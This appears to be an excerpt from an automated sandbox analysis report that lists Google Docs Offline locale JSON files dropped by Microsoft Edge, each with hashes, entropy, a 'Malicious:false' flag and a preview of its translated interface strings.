                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1425
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.461560329690825
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                                                                                                                                                  MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                                                                                                                                                                  SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                                                                                                                                                  SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                                                                                                                                                  SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):961
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.537633413451255
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                                                                                                                                                                  MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                                                                                                                                                                  SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                                                                                                                                                                  SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                                                                                                                                                                  SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):959
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.570019855018913
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                                                                                                                                                                                                                  MD5:535331F8FB98894877811B14994FEA9D
                                                                                                                                                                                                                                                                                  SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                                                                                                                                                                                                                  SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                                                                                                                                                                                                                                                  SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):968
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.633956349931516
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                                                                                                                                                                                                                                                                  MD5:64204786E7A7C1ED9C241F1C59B81007
                                                                                                                                                                                                                                                                                  SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                                                                                                                                                                                                                                                                  SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                                                                                                                                                                                                                                                                  SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):838
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.4975520913636595
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
                                                                                                                                                                                                                                                                                  MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                                                                                                                                                                                                                                                                  SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                                                                                                                                                                                                                                                                  SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                                                                                                                                                                                                                                                                  SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1305
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.673517697192589
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                                                                                                                                                                                                                  MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                                                                                                                                                                                                                                                  SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                                                                                                                                                                                                                  SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                                                                                                                                                                                                                  SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):911
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.6294343834070935
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
                                                                                                                                                                                                                                                                                  MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                                                                                                                                                                                                                                                  SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                                                                                                                                                                                                                                                                  SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                                                                                                                                                                                                                                                  SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):939
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.451724169062555
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                                                                                                                                                                                                                                                                  MD5:FCEA43D62605860FFF41BE26BAD80169
                                                                                                                                                                                                                                                                                  SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                                                                                                                                                                                                                                                                  SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                                                                                                                                                                                                                                                  SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):977
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.622066056638277
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                                                                                                                                                                                                                  MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                                                                                                                                                                                                                  SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                                                                                                                                                                                                                  SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                                                                                                                                                                                                                                                  SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):972
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.621319511196614
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                                                                                                                                                                                                                  MD5:6CAC04BDCC09034981B4AB567B00C296
                                                                                                                                                                                                                                                                                  SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                                                                                                                                                                                                                  SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                                                                                                                                                                                                                  SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):990
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.497202347098541
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                                                                                                                                                                                                                                                                  MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                                                                                                                                                                                                                                                                  SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                                                                                                                                                                                                                                                                  SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                                                                                                                                                                                                                                                                  SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1658
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.294833932445159
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
                                                                                                                                                                                                                                                                                  MD5:BC7E1D09028B085B74CB4E04D8A90814
                                                                                                                                                                                                                                                                                  SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                                                                                                                                                                                                                                                                  SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                                                                                                                                                                                                                                                                  SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1672
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.314484457325167
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
                                                                                                                                                                                                                                                                                  MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                                                                                                                                                                                                                                                                  SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                                                                                                                                                                                                                                                                  SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                                                                                                                                                                                                                                                                  SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):935
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.6369398601609735
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                                                                                                                                                                                                                                                                  MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                                                                                                                                                                                                                                                                  SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                                                                                                                                                                                                                                                                  SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                                                                                                                                                                                                                                                                  SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1065
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.816501737523951
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
                                                                                                                                                                                                                                                                                  MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                                                                                                                                                                                                                                                                  SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                                                                                                                                                                                                                                                                  SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                                                                                                                                                                                                                                                                  SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                                                                                                                                                                                                                                                                  Malicious:false
